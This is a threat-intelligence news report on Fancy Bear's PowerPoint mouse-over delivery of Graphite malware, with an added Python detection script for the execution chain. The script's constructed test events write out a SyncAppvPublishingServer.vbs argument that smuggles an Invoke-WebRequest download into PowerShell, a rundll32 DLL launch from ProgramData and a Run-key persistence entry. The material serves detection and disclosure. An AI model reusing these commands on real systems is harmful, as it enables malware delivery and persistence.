Fancy Bear hackers exploit PowerPoint files to spread Graphite malware

Fancy Bear (also tracked as APT28), a hacking group affiliated with Russia's military intelligence service GRU, has struck again with a novel code execution technique, warns threat intelligence firm Cluster25.

The attack abuses a mouse-over action attached to a hyperlink inside a Microsoft PowerPoint presentation: when the pointer passes over the link, PowerPoint's "Run program" action launches SyncAppvPublishingServer.vbs, a Microsoft-signed script shipped in System32 that passes its argument string on to PowerShell. The malicious PowerShell therefore runs through a trusted Windows component rather than being invoked directly by the Office process, a known living-off-the-land technique that defeats naive "Office spawns powershell.exe" detections.


The mouse-over technique is being used to spread the Graphite malware. Targets are lured with PowerPoint (.PPT) files that pose as material from the Organization for Economic Co-operation and Development (OECD).

Inside the PPT file are two slides, featuring instructions in English and French for using the Interpretation option in the Zoom video-conferencing app.

“When opening the lure document in presentation mode and the victim hovers the mouse over a hyperlink, a malicious PowerShell script is activated to download a JPEG file (“DSC0002.jpeg”) from a Microsoft OneDrive account,” explained Cluster25.

“The JPEG is an encrypted DLL file (lmapi2.dll) that is decrypted and dropped in the 'C:\ProgramData\' directory, later executed via rundll32.exe. A registry key for persistence is also created for the DLL.”

Once deobfuscated, the resulting payload, the Graphite malware, abuses the Microsoft Graph API and OneDrive for command and control (C2) instead of attacker-owned infrastructure, so its beaconing blends into legitimate Microsoft 365 traffic. To access the service, the threat actor uses a fixed client ID together with a valid OAuth2 token.
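As an added example (not part of the article or Cluster25's report), the following rules encode the execution chain quoted above and the Graph API C2 as detections over Sysmon-style process-creation, network-connection and registry events. The event records are constructed for the demonstration; the field names, the wscript.exe parent/child layout and the rundll32 command line for lmapi2.dll are assumptions rather than observed telemetry.

```python
import re

OFFICE_APPS = {"powerpnt.exe", "winword.exe", "excel.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe", "mshta.exe"}
# Graphite talks to OneDrive through the Graph API, so the C2 endpoints are Microsoft's own.
GRAPH_HOSTS = {"graph.microsoft.com", "login.microsoftonline.com"}
# A DLL loaded by rundll32 from C:\ProgramData matches the drop location in the report.
PROGRAMDATA_DLL = re.compile(r"c:\\programdata\\[^\s\"']+\.dll", re.I)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Run every rule over every event; return (rule_name, event) pairs in event order."""
    hits = []
    for ev in events:
        img, parent = _basename(ev.get("image", "")), _basename(ev.get("parent_image", ""))
        cmd = ev.get("cmdline", "")
        if ev["event"] == "process_create":
            # Stage 1: an Office process spawning a script host (the "Run program" action fires).
            if parent in OFFICE_APPS and img in SCRIPT_HOSTS:
                hits.append(("office_spawns_script_host", ev))
            # SyncAppvPublishingServer with a ';' in its argument: the LOLBAS injection shape,
            # where the text after the separator is handed to PowerShell.
            if "syncappvpublishingserver" in cmd.lower() and ";" in cmd:
                hits.append(("syncappv_lolbin_argument_injection", ev))
            # Stage 2: rundll32 executing a DLL out of C:\ProgramData.
            if img == "rundll32.exe" and PROGRAMDATA_DLL.search(cmd):
                hits.append(("rundll32_programdata_dll", ev))
        elif ev["event"] == "network_connect":
            # Stage 3: rundll32 has no business talking to the Graph API on its own.
            if img == "rundll32.exe" and ev.get("dest_host", "").lower() in GRAPH_HOSTS:
                hits.append(("rundll32_to_graph_api", ev))
        elif ev["event"] == "registry_set":
            # Persistence: a Run key value pointing at the dropped DLL.
            key, value = ev.get("key", "").lower(), ev.get("value", "")
            if "\\currentversion\\run" in key and PROGRAMDATA_DLL.search(value):
                hits.append(("run_key_programdata_dll", ev))
    return hits


OFFICE = "C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.EXE"
# Constructed events: the chain from the report plus two benign records that must not fire.
CONSTRUCTED_EVENTS = [
    {"event": "process_create", "image": OFFICE, "parent_image": "C:\\Windows\\explorer.exe",
     "cmdline": '"POWERPNT.EXE" C:\\Users\\u\\Downloads\\oecd_zoom_instructions.pptx'},
    {"event": "process_create", "image": "C:\\Windows\\System32\\wscript.exe", "parent_image": OFFICE,
     "cmdline": 'wscript.exe C:\\Windows\\System32\\SyncAppvPublishingServer.vbs '
                '"n;Invoke-WebRequest https://example.invalid/DSC0002.jpeg -OutFile $env:TEMP\\DSC0002.jpeg"'},
    {"event": "process_create", "image": "C:\\Windows\\System32\\rundll32.exe",
     "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "rundll32.exe C:\\ProgramData\\lmapi2.dll,#1"},
    {"event": "network_connect", "image": "C:\\Windows\\System32\\rundll32.exe",
     "dest_host": "graph.microsoft.com", "dest_port": 443},
    {"event": "registry_set", "image": "C:\\Windows\\System32\\rundll32.exe",
     "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\lmapi2",
     "value": "rundll32.exe C:\\ProgramData\\lmapi2.dll,#1"},
    {"event": "process_create", "image": "C:\\Windows\\System32\\rundll32.exe",
     "parent_image": "C:\\Windows\\explorer.exe",
     "cmdline": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"},
]


if __name__ == "__main__":
    for rule, ev in detect(CONSTRUCTED_EVENTS):
        print(f"{rule:40s} {ev['event']:15s} {_basename(ev.get('image', ''))}")
```

The second constructed event trips two rules at once, which is the point: even if the Office-to-script-host rule is tuned away for a noisy environment, the argument shape of SyncAppvPublishingServer.vbs alone is enough to flag the launch, and the later rules catch the rundll32 stage independently.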

“Graphite malware's purpose is to allow the attacker to load other malware into system memory. It was documented back in January by researchers at Trellix, a merger of McAfee Enterprise and FireEye, who named it so specifically because it leverages the Microsoft Graph API to use OneDrive as C2,” reports Bleeping Computer.